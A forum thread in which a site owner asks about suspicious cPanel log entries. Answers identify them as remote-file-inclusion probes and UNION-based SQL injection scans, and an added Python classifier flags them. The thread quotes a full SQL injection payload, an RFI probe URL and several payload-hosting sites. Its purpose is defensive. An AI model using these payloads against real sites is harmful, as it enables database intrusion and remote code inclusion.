Is this an injection attempt or a normal request?
In cPanel's Analog Stats statistics module, I've noticed countless requests to connect to the following example:
/?x=19&y=15
The numbers are random, but it's always setting x and y variables.
Another category of mysterious requests:
/?id=http://nic.bupt.edu.cn/media/j1.txt??
There are other attempts at injections in the request log that have straight sql written into them as well. Example:
/jobs/jobinfo.php?id=-999.9 UNION ALL SELECT 1,(SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM information_schema.tables WHERE table_schema=0x73636363726F6F745F7075626C6963),3,4,5,6,7,8,9,10,11,12,13--
It looks like they are all reaching a 404, but I'm still wondering about the intent behind these.
I know this is vague, but maybe someone knows that this is normal while using cPanel & phpMyAdmin services. Also, there was a search box installed on the site which could be the reason.
Any suggestions as to what all these are?
EDIT
I pulled all of these out of the request lists and sliced off the txt they are pointing to. Maybe this provides more help as to what kind of attacks these are.
http://www.diakonia-jkt.sch.id
http://www.nationalmedecine.com
http://muzykologia.lublin.pl
http://www.abi.co.uk
http://stul.netsolutions.cz
http://jack.tiscali.it
http://solid.go.ro
http://nic.bupt.edu.cn
http://www.europeanforumcyprus.eu
http://www.nationalmedecine.com
Also, in the phpMyAdmin status section, it shows ~900 change db queries per hour. Can a user with only select privs do any real damage to the db? There is no personal info on it, but these SOBs are clogging up the bandwidth.
These (except for the top one) are automated(?) attempts to find weaknesses in the code:
/?id=http://nic.bupt.edu.cn/media/j1.txt??
Tries to import a PHP page from another server. A well-known problem, especially with older PHP software.
The "UNION ALL SELECT 1" is an obvious SQL insertion attempt. Schema ID 0x73636363726F6F745F7075626C6963 decodes to "scccroot_public". I'm not sure which database this is for. But they are trying to take control of it, that's for sure.
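To see how the three request types in the question separate from ordinary traffic, here is a small classifier written as an added example for this thread (not code from the original post or any of the answers). It runs over a constructed sample log built from the paths quoted in the question, flags a parameter whose value is a remote URL as a remote-file-inclusion probe, flags SQL keywords in the query string and decodes the MySQL `0x...` literals (so the hex schema name above comes out as `scccroot_public`), and treats an `x`/`y` pair of integers as the click coordinates an `<input type="image">` submits. The log format (one `METHOD PATH` line per request) and the regexes are assumptions made for the example, not anything cPanel or Analog produces.

```python
"""Classify the suspicious request paths from the question.

Added example for this thread, not code from the original post or answers.
Assumed input format: one 'METHOD PATH' line per request; the sample lines
below are constructed from the paths quoted in the question.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample log, modelled on the paths quoted in the question.
SAMPLE_LOG = """\
GET /?x=19&y=15
GET /?x=3&y=41
GET /?id=http://nic.bupt.edu.cn/media/j1.txt??
GET /jobs/jobinfo.php?id=-999.9 UNION ALL SELECT 1,(SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM information_schema.tables WHERE table_schema=0x73636363726F6F745F7075626C6963),3,4,5,6,7,8,9,10,11,12,13--
GET /jobs/jobinfo.php?id=42
"""

# MySQL hex string literals such as 0x7e or 0x7363...; payloads use them to
# avoid quote characters, so decoding them shows what the query really names.
HEX_LITERAL = re.compile(r"0x([0-9A-Fa-f]{2,})")
# Fragments that almost never appear in a legitimate query string.
SQLI_PATTERN = re.compile(
    r"\b(union\s+(all\s+)?select|information_schema|concat\s*\(|sleep\s*\()", re.I)
REMOTE_URL = re.compile(r"^(https?|ftp)://", re.I)


def decode_hex_literals(text):
    """Decode every 0x... literal in text that is valid ASCII; skip the rest."""
    decoded = []
    for h in HEX_LITERAL.findall(text):
        if len(h) % 2:
            continue
        try:
            decoded.append(bytes.fromhex(h).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded


def classify_request(line):
    """Return (label, detail) for one 'METHOD PATH' log line."""
    target = line.split(" ", 1)[1] if " " in line else line
    parts = urlsplit(target)
    # parse_qs already percent-decodes the values.
    params = parse_qs(parts.query, keep_blank_values=True)
    for name, values in params.items():
        for value in values:
            if REMOTE_URL.match(value):
                # A full URL in a parameter is the signature of a remote file
                # inclusion probe against code that does include($_GET[...]).
                return "remote_file_inclusion", f"{name}={value}"
    query = unquote(parts.query)
    if SQLI_PATTERN.search(query):
        return "sql_injection", f"hex literals decode to {decode_hex_literals(query)}"
    if set(params) == {"x", "y"} and all(v[0].isdigit() for v in params.values()):
        # Browsers submit the click coordinates of <input type="image"> as x/y.
        return "image_submit_coords", "click on an image submit button"
    return "normal", ""


def summarize(log_text):
    """Count labels over a whole log to see which kind of probe dominates."""
    counts = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        label, _ = classify_request(line)
        counts[label] = counts.get(label, 0) + 1
    return counts


if __name__ == "__main__":
    for line in SAMPLE_LOG.splitlines():
        label, detail = classify_request(line)
        print(f"{label:24} {detail}")
    print(summarize(SAMPLE_LOG))
```

Run against the sample log it reports two image-button clicks, one remote-file-inclusion probe, one SQL injection probe (with the schema name decoded) and one ordinary request. The `x`/`y` pairs are the only category that is normal browser behaviour; the other two are worth a firewall or fail2ban rule even when they land on a 404, since the same scanner will keep trying other paths.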
x=19&y=15
looks like you have a form on your site with method=get and an input type=image. Do you log referrer?
/?x=19&y=15
could represent an <input type="image" />
/?id=http://nic.bupt.edu.cn/media/j1.txt?? looks like some sort of cross-site stuff, a useless one because it loads a plain text file O_O